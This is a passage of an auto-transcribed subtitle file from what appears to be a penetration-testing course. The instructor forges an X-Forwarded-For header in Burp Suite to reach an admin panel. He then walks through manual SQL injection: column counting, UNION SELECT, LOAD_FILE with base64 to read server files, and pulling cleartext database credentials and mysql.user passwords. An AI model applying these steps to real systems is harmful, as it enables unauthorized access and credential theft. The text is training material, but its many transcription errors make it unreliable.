IP will go in this place. 387 00:27:39,430 --> 00:27:39,750 Right. 388 00:27:40,350 --> 00:27:40,910 Makes sense. 389 00:27:41,760 --> 00:27:42,250 The presenter. 390 00:27:43,520 --> 00:27:49,670 And that looks a lot better, but it's still a lot of data, so it probably won't filter out anything 391 00:27:49,670 --> 00:27:50,810 that's 89 characters. 392 00:27:51,800 --> 00:27:54,040 Let's go up let's look down here to see how to do that. 393 00:27:54,950 --> 00:28:00,560 And it looks like if we do a dash tech attack, H.H. and then a number for the number of characters, 394 00:28:01,220 --> 00:28:02,780 it will filter those out. 395 00:28:04,250 --> 00:28:08,780 OK, let's go back here and we do a technical H.H. Eighty-Nine. 396 00:28:12,080 --> 00:28:17,450 That looks a lot better now we see there's one particular header and IP combination that gets us a different 397 00:28:17,450 --> 00:28:18,110 response. 398 00:28:19,610 --> 00:28:20,510 Still 200 code. 399 00:28:20,990 --> 00:28:25,280 We're getting 466 words back or almost 8000 characters back. 400 00:28:25,910 --> 00:28:29,990 Those copy this and let's put this in the burb and see if we can figure out what is going on. 401 00:28:32,580 --> 00:28:39,390 It was called that out, let's close this out and let's make sure we are putting the traffic through 402 00:28:39,390 --> 00:28:43,950 berp and let's see, let's go to Berp. 403 00:28:45,810 --> 00:28:49,900 Choppers intercept is on its go to admin. 404 00:28:50,880 --> 00:28:53,220 We grabbed it and let's go and put this new field in here. 405 00:28:56,030 --> 00:29:00,090 Have you noticed this is this eight is way out here, so I'm going to drag it back in. 406 00:29:02,060 --> 00:29:08,780 And I'm going to change this single dash to a colon and then I'm going to hit this little new line button 407 00:29:08,900 --> 00:29:13,520 so that we can see that each header has appropriate ending at the end. 408 00:29:14,270 --> 00:29:18,290 Again, as a new line character for Windows, which is what we want. 409 00:29:20,010 --> 00:29:21,720 All right, so that looks good. 410 00:29:21,750 --> 00:29:23,100 Let's go ahead and forward it. 411 00:29:24,160 --> 00:29:27,900 We've got a response back and so far it looks good. 412 00:29:27,930 --> 00:29:31,050 Let's go ahead and turn intercept off and see if it forwards us through. 413 00:29:31,470 --> 00:29:32,070 Yes. 414 00:29:32,070 --> 00:29:32,780 To the back end. 415 00:29:33,480 --> 00:29:34,200 And this is really cool. 416 00:29:34,590 --> 00:29:35,220 You see products. 417 00:29:35,220 --> 00:29:36,740 We see a way to create products. 418 00:29:36,750 --> 00:29:39,570 We see categories, you know, again, we can control. 419 00:29:39,570 --> 00:29:47,490 You look at the source code here, look at any anything that looks interesting to us, any comments, 420 00:29:48,810 --> 00:29:51,930 you know, any scripts and some hidden fields here. 421 00:29:52,410 --> 00:29:52,770 Right. 422 00:29:52,990 --> 00:29:55,260 Sometimes you can find credentials and things like that in hidden fields. 423 00:29:56,410 --> 00:30:01,860 But we're going to notice if we try to do anything like, for example, test for a single injection 424 00:30:02,160 --> 00:30:02,910 with a single tick. 425 00:30:04,340 --> 00:30:05,340 Was going to say the head was missing. 426 00:30:05,900 --> 00:30:06,920 How do you think we can fix this? 427 00:30:08,460 --> 00:30:09,330 Think about it for a moment. 428 00:30:10,320 --> 00:30:12,510 What we want to do, all the traffic is going to burp. 429 00:30:13,290 --> 00:30:18,060 So, you know, if we can rewrite each request to include that header, we might be able to get around 430 00:30:18,060 --> 00:30:18,200 it. 431 00:30:19,110 --> 00:30:19,950 So we've got two options. 432 00:30:20,880 --> 00:30:24,030 Go down to match, replace. 433 00:30:25,260 --> 00:30:31,050 And we're going to go to add, and this is what it says, type requested her match Reddick's condition 434 00:30:31,050 --> 00:30:32,280 to match lifelink to add. 435 00:30:32,280 --> 00:30:35,550 And you better get because we want to do we want to add new header. 436 00:30:35,560 --> 00:30:40,190 So we will leave this field blank and the little string to replace we've blank to remove a matched header. 437 00:30:40,380 --> 00:30:40,640 Nope. 438 00:30:40,650 --> 00:30:43,110 We want a real string to add. 439 00:30:44,360 --> 00:30:46,130 So we're going to just copy and paste it in. 440 00:30:46,570 --> 00:30:47,560 I'm going to clean this up. 441 00:30:52,310 --> 00:30:56,480 And then I'm going to say for of the copy that to the clipboard in case I need it later I'm going to 442 00:30:56,480 --> 00:31:04,250 say and then Portale bypass the custom HDB header. 443 00:31:05,450 --> 00:31:08,840 OK, let's call them here and if he had selected. 444 00:31:10,260 --> 00:31:15,750 All right, so now the requests are being rewritten, and if we go back to the Web page, we should 445 00:31:15,750 --> 00:31:16,110 see. 446 00:31:18,010 --> 00:31:19,150 The page loads just fine. 447 00:31:21,200 --> 00:31:22,730 Let's see back. 448 00:31:29,260 --> 00:31:35,110 Yep, so everything's working right, and we also see a sequel injection, this is Arabised sequel injection. 449 00:31:35,110 --> 00:31:38,680 Clearly it's saying you have an error and a sequel, Syntex. 450 00:31:38,680 --> 00:31:39,370 So let's play with this. 451 00:31:39,370 --> 00:31:42,040 We're going to do some manual sequel injection, and I'm going to show you something really, really 452 00:31:42,040 --> 00:31:42,580 cool here. 453 00:31:43,210 --> 00:31:44,470 You're finally going to understand this. 454 00:31:44,470 --> 00:31:47,440 If you've always wondered how a sequel injection works, now you'll know. 455 00:31:48,620 --> 00:31:51,940 Let's go back to Berp and let's look at our history. 456 00:31:52,330 --> 00:31:53,320 Let's go down to the bottom. 457 00:31:55,050 --> 00:31:56,630 Let's see, do we have this request? 458 00:32:01,990 --> 00:32:08,920 As we do so, still control our control shift our descended to repeater and then us to control space 459 00:32:09,250 --> 00:32:10,330 to send it through. 460 00:32:12,140 --> 00:32:15,920 What I'm going to do is I'm first can look at the error message in saying that the header is missing. 461 00:32:17,280 --> 00:32:21,270 So for some reason, it didn't actually add the header the requested are here, so let's go and add 462 00:32:21,270 --> 00:32:23,840 that and try to send it again. 463 00:32:25,430 --> 00:32:33,200 Patrol space again, and now it went through and we should see this error right to make it automatically 464 00:32:33,210 --> 00:32:38,120 scroll to that part of the response by typing error in matches. 465 00:32:38,360 --> 00:32:42,510 And if I go to settings, I can actually say Orosco a match when changes. 466 00:32:42,940 --> 00:32:43,230 Right. 467 00:32:44,170 --> 00:32:48,590 So now I can change this to a single take, which is percent 27. 468 00:32:50,270 --> 00:32:51,530 And you see that, right? 469 00:32:51,770 --> 00:32:55,820 If I change it to a P, which is a valid product name, you don't get an error message. 470 00:32:57,170 --> 00:32:57,730 Sweet, sweet. 471 00:32:57,740 --> 00:33:00,790 And how did I know to use P. 472 00:33:00,910 --> 00:33:03,170 Well if we go back here, let's go back. 473 00:33:05,030 --> 00:33:11,130 C.p is a park name, we could have used any of these products, but I use P because it's the easiest 474 00:33:11,130 --> 00:33:11,420 to type. 475 00:33:13,560 --> 00:33:14,280 So let's experiment. 476 00:33:14,310 --> 00:33:17,210 We've got SQL injection here, how can we how can we really test this? 477 00:33:17,220 --> 00:33:17,970 What can we do with this? 478 00:33:18,000 --> 00:33:22,650 Well, the first thing I'd like to do whenever I have single injection is I want to I need to determine 479 00:33:22,650 --> 00:33:24,450 how many columns we have in the database. 480 00:33:25,560 --> 00:33:25,910 Right. 481 00:33:26,280 --> 00:33:28,860 That's really important for a lot of attacks that we're going to do. 482 00:33:30,030 --> 00:33:31,860 So let's go ahead and start by ordering. 483 00:33:31,860 --> 00:33:37,380 Now, actually, what I'm to do first is I'm going to go to three schools and show you how this works. 484 00:33:42,530 --> 00:33:43,590 So forget the injection. 485 00:33:43,610 --> 00:33:45,200 This is just regular school, right? 486 00:33:46,040 --> 00:33:48,080 So it was all set in ascending or descending order. 487 00:33:49,100 --> 00:33:54,770 So we have a database customer's table and we do an order by this. 488 00:33:55,040 --> 00:33:55,670 Look what happens. 489 00:33:55,880 --> 00:33:56,510 Try for itself. 490 00:33:56,510 --> 00:33:56,750 Right. 491 00:33:57,080 --> 00:33:57,920 Click one sequence. 492 00:34:01,010 --> 00:34:07,310 You can see it's ordering by the country right here and we look, these are different. 493 00:34:07,310 --> 00:34:07,840 Collinge Right? 494 00:34:07,850 --> 00:34:12,610 One, two, three, four, five, six, seven. 495 00:34:12,620 --> 00:34:18,770 So one way to identify column is through its index, which is the number of the column. 496 00:34:18,800 --> 00:34:21,970 So if I say order by seven, I should get the same result. 497 00:34:24,600 --> 00:34:26,750 Same thing they ordered by 6:00. 498 00:34:28,380 --> 00:34:29,610 They should order by the postal code. 499 00:34:32,990 --> 00:34:38,060 It does right now, if I say order by 10, I should get an error message because I don't have 10 columns. 500 00:34:38,930 --> 00:34:40,640 So do you see how this was? 501 00:34:41,210 --> 00:34:44,270 This is actually a pretty good way to identify how many columns you have in the database. 502 00:34:44,870 --> 00:34:52,340 So let's go back to Berp, see if we can do that or by I say you might say, oh, let's just do this. 503 00:34:52,340 --> 00:34:52,610 Right. 504 00:34:53,420 --> 00:34:57,650 It's not gonna quite work because our syntax is not correct. 505 00:34:59,180 --> 00:35:02,530 We need to do is we are injecting into a string somewhere. 506 00:35:02,540 --> 00:35:07,450 So we're injecting right here into some query that we don't yet have access to. 507 00:35:08,510 --> 00:35:10,400 And there's probably some stuff that comes after this. 508 00:35:11,650 --> 00:35:17,410 Somewhere, so we need to comment that out in the way they do that, and my school is doing that using 509 00:35:17,410 --> 00:35:20,050 attack, attack, attack. 510 00:35:20,320 --> 00:35:20,630 Right. 511 00:35:20,830 --> 00:35:23,020 That's how you can actually comment stuff out. 512 00:35:24,610 --> 00:35:30,180 And here you see it actually completed now because now it's saying Collinet found a known column 10, 513 00:35:31,120 --> 00:35:32,440 but what if I changed it to five? 514 00:35:34,890 --> 00:35:38,820 Control shift and to make it automatically zoom down. 515 00:35:42,430 --> 00:35:44,770 Let's see here what we don't get the error message, so that's good. 516 00:35:44,800 --> 00:35:47,720 So that means there's probably definitely five columns listed. 517 00:35:47,740 --> 00:35:48,160 Six. 518 00:35:49,120 --> 00:35:49,390 Control. 519 00:35:49,980 --> 00:35:51,430 Control space. 520 00:35:54,650 --> 00:36:00,780 And not seeing that either 67 control space error message, a number of them seven. 521 00:36:00,800 --> 00:36:01,820 So we know there's six columns. 522 00:36:02,210 --> 00:36:07,790 Now that we know the six columns, we can use a union injection to append one query into the next. 523 00:36:07,890 --> 00:36:08,140 So. 524 00:36:08,400 --> 00:36:10,900 So unions love this. 525 00:36:11,240 --> 00:36:11,810 Three schools. 526 00:36:12,840 --> 00:36:13,490 Let's look at union. 527 00:36:14,660 --> 00:36:17,090 If I go to C Union. 528 00:36:17,090 --> 00:36:18,170 Union, union. 529 00:36:18,350 --> 00:36:18,880 Here we go. 530 00:36:20,390 --> 00:36:25,400 You can actually join to ResultSet into one ResultSet. 531 00:36:26,420 --> 00:36:26,770 Right. 532 00:36:27,380 --> 00:36:28,130 So let's see here. 533 00:36:32,640 --> 00:36:38,730 So we've got this customer table and we've got the suppliers table and we do a union, it'll join them. 534 00:36:39,120 --> 00:36:40,740 Let me show you try yourself. 535 00:36:41,600 --> 00:36:44,310 So first, let's just take this out so you can see what it looks like. 536 00:36:46,990 --> 00:36:51,820 Without any fancy school going on that just selects all the cities from customers, right. 537 00:36:52,860 --> 00:36:53,290 Jose? 538 00:36:55,530 --> 00:36:59,520 And if we change this to suppliers, take us out. 539 00:37:01,370 --> 00:37:03,790 Forensic suppliers. 540 00:37:05,720 --> 00:37:11,040 The city from the suppliers is the Collimore selecting, so do controls the controls. 541 00:37:12,290 --> 00:37:16,190 Now, if we do both and attach it with a union. 542 00:37:18,600 --> 00:37:21,570 We will actually get both results that's returned in a single. 543 00:37:24,790 --> 00:37:29,530 Which is what we're seeing here, in order for this to work, the number of columns has to match between 544 00:37:29,530 --> 00:37:35,440 both union, between both iSelect statements on both sides of the union and the data type has to match 545 00:37:35,440 --> 00:37:35,830 as well. 546 00:37:36,430 --> 00:37:41,410 Another good explanation for this is sports figures, website, sports wigger, sexual union. 547 00:37:45,270 --> 00:37:48,960 This used to really confuse me, but this stuff really makes a lot of sense, if you think about it. 548 00:37:51,080 --> 00:37:56,660 To determine the number of columns see first we're ordering by the index of the column, we keep incrementing 549 00:37:56,660 --> 00:37:59,840 until we get an error message and we're just commenting out everything that follows it. 550 00:38:02,200 --> 00:38:03,400 There's another way to do it this way. 551 00:38:03,610 --> 00:38:09,250 I use the autobio because it's less likely to be caught by detection tools like Web application firewalls 552 00:38:10,810 --> 00:38:11,590 and things like that. 553 00:38:14,780 --> 00:38:19,290 And then once you find out how many columns you are you have, you want to see what the data is. 554 00:38:19,700 --> 00:38:24,230 So here we're just searching through each column type until we find what we're trying to see. 555 00:38:24,230 --> 00:38:26,090 If we have, we can insert a string. 556 00:38:27,620 --> 00:38:32,360 In each of these columns, because that's how we're going to use other injection point to go back here. 557 00:38:33,910 --> 00:38:43,270 Let's just do this right, union, select one, two, three, four, five, six, control shift, we 558 00:38:43,270 --> 00:38:45,540 shouldn't get an error message or anything, right? 559 00:38:45,550 --> 00:38:46,480 So far, everything's good. 560 00:38:47,650 --> 00:38:49,510 So let's go ahead and put in this first field. 561 00:38:50,590 --> 00:38:54,490 Let's just put a user called a user function and see what happens. 562 00:38:56,720 --> 00:39:01,220 We got a user, so let's scroll down to this every time what I'm going to do is I'm going to search 563 00:39:01,730 --> 00:39:02,930 for TD to. 564 00:39:06,410 --> 00:39:11,720 TD to TD, What I'm doing is an e-mail, I'm telling it to match on this particular string. 565 00:39:11,960 --> 00:39:17,090 So every time we do our as we're building our sequel injection query, we can immediately see the results 566 00:39:17,090 --> 00:39:18,600 without having to scroll down the response. 567 00:39:19,380 --> 00:39:19,700 All right. 568 00:39:19,710 --> 00:39:20,510 So that's a user. 569 00:39:20,540 --> 00:39:25,970 We see that this database is running as the manager and local host can probably look at the database 570 00:39:25,970 --> 00:39:26,330 to. 571 00:39:31,480 --> 00:39:36,550 Yeah, where the warehouse database, let's see what else we can do, we can probably look at the version. 572 00:39:39,540 --> 00:39:40,710 Yep, indeed. 573 00:39:41,640 --> 00:39:48,420 Now, the next thing I want to do is fill some files, right, because we have this injection point. 574 00:39:50,200 --> 00:39:58,420 And, you know, we can use this to see what files we can grab so we know this is a Windows server and 575 00:39:59,110 --> 00:40:01,390 let's see if we can pull something out of here. 576 00:40:02,670 --> 00:40:04,870 Let's do a load file. 577 00:40:07,480 --> 00:40:08,020 Tick, tick. 578 00:40:08,320 --> 00:40:12,040 And this is a Windows box, so it's probably going to be in the C drive. 579 00:40:12,090 --> 00:40:14,230 I'm just I'm just guessing where it's going to be. 580 00:40:15,350 --> 00:40:18,890 Let's see, Einat pub, maybe W-W route. 581 00:40:19,450 --> 00:40:25,840 Let's just try and P right now we have two thousand two hundred fifty five bytes control space. 582 00:40:26,050 --> 00:40:27,070 That number changed. 583 00:40:28,930 --> 00:40:32,500 So it's possible that the behavior of this page changed in some way. 584 00:40:33,480 --> 00:40:35,400 But I don't see a file, right? 585 00:40:35,430 --> 00:40:37,070 I don't see anything expelled. 586 00:40:38,540 --> 00:40:40,500 We could try converting this to be 64. 587 00:40:42,500 --> 00:40:44,690 To base 60 for. 588 00:40:50,200 --> 00:40:58,180 Control space and are now getting an error message and it says function warehouse to base64 does not 589 00:40:58,180 --> 00:40:59,570 exist, so this function doesn't exist. 590 00:41:00,430 --> 00:41:01,890 Maybe I did this wrong. 591 00:41:01,900 --> 00:41:05,980 Maybe it's to underscore base64 control space. 592 00:41:06,220 --> 00:41:06,730 Yes. 593 00:41:08,570 --> 00:41:10,790 Now we've got this value that we can decode. 594 00:41:12,740 --> 00:41:16,430 I understand what happened here, so I'm going to go and copy this. 595 00:41:18,020 --> 00:41:21,150 We are loading this file from the local file system of the victim machine. 596 00:41:21,740 --> 00:41:27,710 This happens to be the default webroot for IRS and then we're passing it to base64 so that we can exploit 597 00:41:27,710 --> 00:41:28,130 the data. 598 00:41:28,730 --> 00:41:35,780 We can then go to DeCota control of the paste and then we can say decode as base64. 599 00:41:36,500 --> 00:41:38,740 And now we've got this file. 600 00:41:39,080 --> 00:41:41,690 There is a way to do this and to redo this. 601 00:41:41,690 --> 00:41:43,940 It's just to put it in. 602 00:41:44,450 --> 00:41:50,480 So let's go here, Cyro, then let's do indexed speed up, be 64. 603 00:41:53,640 --> 00:42:02,760 I control the escape, it's easy, Kat, it's there so that we can do zero, the 64. 604 00:42:04,510 --> 00:42:05,290 Index. 605 00:42:07,910 --> 00:42:08,630 See how we got here? 606 00:42:12,470 --> 00:42:13,400 Anything interesting? 607 00:42:15,890 --> 00:42:17,630 Well, this is the source code that we saw, right? 608 00:42:19,750 --> 00:42:25,600 So nothing really different than what we've already seen, but remember, there was an admin copyright. 609 00:42:28,130 --> 00:42:29,070 Let's try to grab that file. 610 00:42:30,620 --> 00:42:31,580 Let's go back to our Peter. 611 00:42:33,180 --> 00:42:34,140 Change this to. 612 00:42:37,600 --> 00:42:39,360 Controlled space, yeah. 613 00:42:39,490 --> 00:42:40,570 Now we're cooking with gas. 614 00:42:41,290 --> 00:42:42,130 Let's grab this. 615 00:42:46,510 --> 00:42:53,410 Right, quick copy of Tab zero, then admin tab 64. 616 00:42:56,590 --> 00:43:04,540 And let's see, I control we shapeshifters zero 64. 617 00:43:05,670 --> 00:43:09,240 Let's do I may not be 60 for. 618 00:43:11,080 --> 00:43:12,250 All right, let's actually look at that. 619 00:43:14,580 --> 00:43:15,240 We can't. 620 00:43:16,810 --> 00:43:22,720 Let's see, hold on, because I want to look at it in them, because it all has a syntax highlighting 621 00:43:23,080 --> 00:43:24,010 and things like that. 622 00:43:24,880 --> 00:43:28,150 So let's see here, first of all. 623 00:43:29,420 --> 00:43:32,360 My OCD is getting mad because these formats don't follow. 624 00:43:33,530 --> 00:43:40,130 So let me go and change that pseudo move and then to be 64. 625 00:43:41,130 --> 00:43:45,030 OK, and then what we can do is zero base64. 626 00:43:48,360 --> 00:43:55,400 Dashti, and then we will output that to admin top HP. 627 00:43:56,210 --> 00:43:57,780 OK, so permission denied. 628 00:43:57,810 --> 00:43:58,980 Let's do this as root. 629 00:44:00,600 --> 00:44:03,160 Zero Dashi CD. 630 00:44:06,630 --> 00:44:08,860 CD, home pentameter. 631 00:44:10,470 --> 00:44:18,000 Control, and then we can do Base64 Dashty and now put that to them and. 632 00:44:21,290 --> 00:44:29,180 Now it's there, and if we exit that and go back to a protester account, we should now be able to look 633 00:44:29,180 --> 00:44:31,200 at this in them. 634 00:44:32,000 --> 00:44:34,670 So let's go up here, exit. 635 00:44:36,390 --> 00:44:38,130 And let's take a look at what's going on here. 636 00:44:39,600 --> 00:44:39,950 Oops. 637 00:44:41,250 --> 00:44:41,830 Here we go. 638 00:44:42,390 --> 00:44:43,080 Let's go to the top. 639 00:44:45,400 --> 00:44:49,570 Something that right here looks like a clipped off the top of this, and so let's try it again. 640 00:44:50,740 --> 00:44:52,510 Chef Colin Cubing. 641 00:44:54,700 --> 00:44:55,240 Here we go. 642 00:44:55,990 --> 00:45:03,910 All right, so it's saying this is this IPE 190, 160 for that 28. 643 00:45:04,480 --> 00:45:05,470 Is it is it a ray? 644 00:45:05,740 --> 00:45:07,430 It's a single value of this array. 645 00:45:07,430 --> 00:45:09,670 And we're going to start restoring the variable named aloud. 646 00:45:10,480 --> 00:45:18,310 And then it's saying if the X voted for heter is not set, then take the remote address the network 647 00:45:18,310 --> 00:45:23,260 at the address that's connecting to the server and stored in this this server. 648 00:45:24,230 --> 00:45:25,820 Array called these TDP Orjan. 649 00:45:27,490 --> 00:45:31,520 So that's just some housekeeping there, but this is the real bread and butter, this part right here 650 00:45:31,520 --> 00:45:34,210 is saying if allowed. 651 00:45:36,000 --> 00:45:47,040 He's in this array, so if the IP these are connecting from is in this exploded for header that's being 652 00:45:47,040 --> 00:45:48,960 sent in, then. 653 00:45:49,880 --> 00:45:56,480 If this information is true, you notice there's nothing here, so we should just skip over the ELTs 654 00:45:56,480 --> 00:45:58,260 and go directly to loading the admin page. 655 00:45:59,060 --> 00:46:01,250 Otherwise, the header isn't there. 656 00:46:02,210 --> 00:46:04,130 And so we get the same message which we've seen already. 657 00:46:04,130 --> 00:46:04,370 Right. 658 00:46:06,070 --> 00:46:06,890 You've already seen this. 659 00:46:08,600 --> 00:46:11,780 So let's go ahead and scroll down this page and see if there's anything else that's interesting here. 660 00:46:13,480 --> 00:46:18,460 This is the actual sequel injection point, so you can see it's a select start from products, order 661 00:46:18,460 --> 00:46:21,280 by name, extending limit five. 662 00:46:21,940 --> 00:46:24,070 So we are injecting in this name parameter right here. 663 00:46:26,630 --> 00:46:29,360 And when we put that single tick. 664 00:46:30,500 --> 00:46:33,200 That single ticket is closing out this single tick. 665 00:46:36,140 --> 00:46:46,910 And then we put the P and Tic-Tac that attack, that part comments out this entire section right here. 666 00:46:48,240 --> 00:46:50,490 It's hard for me to highlight this, but. 667 00:46:51,680 --> 00:46:56,990 If I can go back to berp, let's see, yeah, so this PAETEC, that PAETEC there. 668 00:46:58,780 --> 00:47:02,230 Is here in the tech, they're closes up this here. 669 00:47:04,080 --> 00:47:06,840 And then going back to this injection point. 670 00:47:09,060 --> 00:47:17,180 This dashed space dash comments out everything else out here, a sea space limit, space five, right? 671 00:47:19,660 --> 00:47:22,760 And then we're just putting all this data in in its place. 672 00:47:22,780 --> 00:47:23,620 This is all going. 673 00:47:24,780 --> 00:47:31,770 In this name field, so there's no prioritization, is no sanitisation, is literally just passing this 674 00:47:31,770 --> 00:47:36,660 raw name, which is unsanitized, it's very unsafe. 675 00:47:36,890 --> 00:47:38,700 It's being passed into this product array. 676 00:47:40,500 --> 00:47:47,820 And that is being essentially it's printing out the raw values of this array into these the source code 677 00:47:47,820 --> 00:47:48,640 of the Web application. 678 00:47:49,320 --> 00:47:50,970 So this is why the sequel injection works. 679 00:47:51,330 --> 00:47:52,590 Later, we're actually going to look at the logs. 680 00:47:52,600 --> 00:47:53,670 I'm going to show you what it looks like. 681 00:47:54,750 --> 00:47:56,410 You're going to be surprised because you're not going to see it. 682 00:47:57,300 --> 00:47:58,260 I'll tell you what I mean a moment. 683 00:47:58,270 --> 00:48:00,690 So that's interesting. 684 00:48:01,020 --> 00:48:04,460 But we also noticed there's a database that file here. 685 00:48:05,340 --> 00:48:08,460 So we should try to get that because database files usually have credentials. 686 00:48:09,130 --> 00:48:12,600 So let's go ahead and exit this. 687 00:48:15,510 --> 00:48:19,160 So let's update this to database control space. 688 00:48:19,350 --> 00:48:24,470 We've got some more goodness got that on the clipboard and let's take a look at it. 689 00:48:38,840 --> 00:48:43,010 Scape shivs easy and they will do the 64. 690 00:48:46,930 --> 00:48:47,590 Decode. 691 00:48:49,190 --> 00:48:51,710 It wasn't allowed to databased BHP. 692 00:49:00,980 --> 00:49:02,210 Collins said, no. 693 00:49:02,540 --> 00:49:08,060 I just like having the numbers there so that the database name got the username and we've got clear 694 00:49:08,060 --> 00:49:10,250 tax credits, very, very nice. 695 00:49:11,660 --> 00:49:13,070 So we should add this to our list. 696 00:49:13,340 --> 00:49:18,220 So control a shift percent of them. 697 00:49:18,530 --> 00:49:20,050 Let's call Cretz that text. 698 00:49:21,180 --> 00:49:23,490 I was put in this manager. 699 00:49:24,880 --> 00:49:26,080 And we see the password here. 700 00:49:27,350 --> 00:49:27,750 See? 701 00:49:29,430 --> 00:49:35,670 Having some problems like this, if I press, why, why control a great escape? 702 00:49:36,770 --> 00:49:43,610 Capital P didn't do what I wanted you to undo, I had to type it in. 703 00:49:47,440 --> 00:49:53,440 Why is Young supposed to copy it to the clipboard and then capital P supposed to paste it and then I 704 00:49:53,440 --> 00:49:55,870 like to put where we found it, so. 705 00:49:56,840 --> 00:49:57,500 Discovered. 706 00:50:00,970 --> 00:50:02,250 Let's put it on above it. 707 00:50:04,920 --> 00:50:12,750 Discovered the sequel injection data exfiltration SQL Injection. 708 00:50:15,840 --> 00:50:19,020 Chained to local fowl include. 709 00:50:21,220 --> 00:50:26,860 Data leading to data excel to data exfiltration. 710 00:50:31,900 --> 00:50:33,850 Cat creds, nice. 711 00:50:34,840 --> 00:50:41,200 All right, so it's this you've got some creds cooking with gas. 712 00:50:43,060 --> 00:50:45,060 So let's see what else we can do here. 713 00:50:47,010 --> 00:50:59,100 Let's take a look at the my sequel's camera two w w o Google my school information schema. 714 00:51:04,610 --> 00:51:05,100 Sweet. 715 00:51:05,150 --> 00:51:06,410 So there should be a schemata. 716 00:51:12,630 --> 00:51:13,390 Let's getting out of table. 717 00:51:13,480 --> 00:51:19,710 Yes, this is our table provides information about databases, name of the schema. 718 00:51:21,930 --> 00:51:23,160 See, what do we want to get out of here? 719 00:51:24,090 --> 00:51:25,890 You probably want the name of the schema, right? 720 00:51:26,160 --> 00:51:29,710 So we can say select, let's first redo this query. 721 00:51:29,710 --> 00:51:31,590 It was changed up, actually, what we can do. 722 00:51:33,140 --> 00:51:42,620 That's what's rename this double click in here, we call this sequel to Elfy, let's rebuild this query, 723 00:51:43,070 --> 00:51:47,240 take out a load file and then I'll take out to base. 724 00:51:48,790 --> 00:51:49,570 Let's go back here. 725 00:51:51,010 --> 00:51:52,810 Information, schemas, schemata. 726 00:51:54,470 --> 00:51:55,100 Select. 727 00:51:56,870 --> 00:51:58,480 What are we selecting schema name? 728 00:51:59,270 --> 00:52:02,720 So this is the column select schema name. 729 00:52:04,520 --> 00:52:15,530 Schema name from information schema that is Gimbert control space to see think that works. 730 00:52:20,320 --> 00:52:26,590 Let's see if we've got some kind of syntax error here, schemin name from inflammations keema that's 731 00:52:26,590 --> 00:52:28,030 give out, let's just copy and paste. 732 00:52:29,340 --> 00:52:30,630 I find that sometimes works better. 733 00:52:33,800 --> 00:52:34,360 Joseph. 734 00:52:35,760 --> 00:52:36,120 V.. 735 00:52:40,150 --> 00:52:41,020 As part of this. 736 00:52:46,090 --> 00:52:47,050 Joe, the. 737 00:52:48,800 --> 00:52:50,120 And we'll just put a dot. 738 00:52:59,010 --> 00:53:01,410 And we're still seeing Erin Siecle Syntex. 739 00:53:06,080 --> 00:53:10,520 Let's see, I could try putting this like this. 740 00:53:14,130 --> 00:53:15,660 Nope, that just makes it a literal string. 741 00:53:17,960 --> 00:53:21,020 So bring these in parentheses, Charles Space. 742 00:53:28,610 --> 00:53:29,840 Let's try another select. 743 00:53:34,690 --> 00:53:35,170 Here we go. 744 00:53:36,250 --> 00:53:41,260 So you notice I had to put this this one used to be this, right? 745 00:53:43,210 --> 00:53:44,350 And if I press control the. 746 00:53:50,470 --> 00:53:53,230 Price controls, you'll see, what I did is I put the whole thing in parentheses. 747 00:53:54,810 --> 00:53:59,790 And then I just ran a sub select statement inside of the parentheses. 748 00:54:00,790 --> 00:54:01,660 When I did that. 749 00:54:03,100 --> 00:54:07,500 I get an error message about cardinality now before we go deeper. 750 00:54:07,860 --> 00:54:12,000 I just realized I forgot to do something and we'll address this area in a second. 751 00:54:12,900 --> 00:54:14,550 What I want to do is I want to copy this. 752 00:54:16,410 --> 00:54:17,640 Control copy. 753 00:54:19,090 --> 00:54:24,910 And when I go all the way back to FDR, did it feel like this is a control space? 754 00:54:26,090 --> 00:54:27,290 Then I want to go to number two. 755 00:54:28,760 --> 00:54:30,980 Control the control space. 756 00:54:33,390 --> 00:54:38,010 Schemata, so now we have these different tabs for each different thing, right, siecle Ayad Allawi 757 00:54:38,310 --> 00:54:39,840 and then schemata right there. 758 00:54:41,470 --> 00:54:47,140 It just makes it a lot easier to stay organized when you have these types specified by purpose and repeater. 759 00:54:48,820 --> 00:54:51,340 And then let's put this era back in. 760 00:54:52,620 --> 00:54:54,720 And make sure it's still set to Orosco to match. 761 00:54:56,130 --> 00:55:02,080 All right, so it's cardinality, but this basically is saying is that we were turning more than one 762 00:55:02,080 --> 00:55:02,520 in a row. 763 00:55:02,790 --> 00:55:06,480 So we need to concatenate the results into one row if we go here. 764 00:55:07,940 --> 00:55:09,560 It's a group concat. 765 00:55:12,290 --> 00:55:13,670 I get functions. 766 00:55:15,970 --> 00:55:21,790 Group concat, this function returns a string result, the concatenated Nonno values from a group, 767 00:55:22,780 --> 00:55:23,580 that's what we want to do. 768 00:55:23,590 --> 00:55:24,670 We want to run this. 769 00:55:26,670 --> 00:55:29,550 This group concat on a single column. 770 00:55:32,230 --> 00:55:33,100 So if we go. 771 00:55:34,140 --> 00:55:34,800 Let's see. 772 00:55:36,550 --> 00:55:37,250 Concat. 773 00:55:40,650 --> 00:55:41,130 Space. 774 00:55:45,560 --> 00:55:50,630 Now, we've got everything here, but it's still a little difficult to read because of these these commas 775 00:55:50,630 --> 00:55:53,570 are putting on the one line I would like to separate by a new line. 776 00:55:54,680 --> 00:56:01,760 So we go back here and you can see that there is a separator, which you can add here, right just at 777 00:56:01,760 --> 00:56:03,890 the end of the group, concat inside the parentheses. 778 00:56:06,170 --> 00:56:08,150 So let's go ahead and do that. 779 00:56:10,290 --> 00:56:12,760 We can say, sir. 780 00:56:13,890 --> 00:56:14,700 Braider. 781 00:56:15,540 --> 00:56:16,530 Let's try a new line. 782 00:56:18,860 --> 00:56:19,340 Joseph. 783 00:56:21,710 --> 00:56:22,370 And that worked. 784 00:56:24,370 --> 00:56:28,710 All right, so now we've got everything on its line and we see there's a MySQL database, so let's try 785 00:56:28,710 --> 00:56:30,480 to connect to that because. 786 00:56:33,200 --> 00:56:37,410 In my school database should have a user called. 787 00:56:48,490 --> 00:56:54,950 Yeah, see, there's a user and there's a password column inside of this table so we can use SQL injection. 788 00:56:54,970 --> 00:56:59,800 We should be able to use the injection to get these two columns, these two fields out of this table, 789 00:56:59,950 --> 00:57:00,940 user and password. 790 00:57:02,140 --> 00:57:03,070 So let's say. 791 00:57:04,660 --> 00:57:05,650 I see what we can do here. 792 00:57:09,090 --> 00:57:18,540 So instead of selecting the scheme a name, we want to do a user name and password, so user password 793 00:57:18,960 --> 00:57:19,500 from. 794 00:57:22,510 --> 00:57:24,010 My school, that user. 795 00:57:25,650 --> 00:57:27,630 Right at the table, bicycled out user. 796 00:57:32,210 --> 00:57:35,510 Control space, syntax error. 797 00:57:36,910 --> 00:57:37,840 And 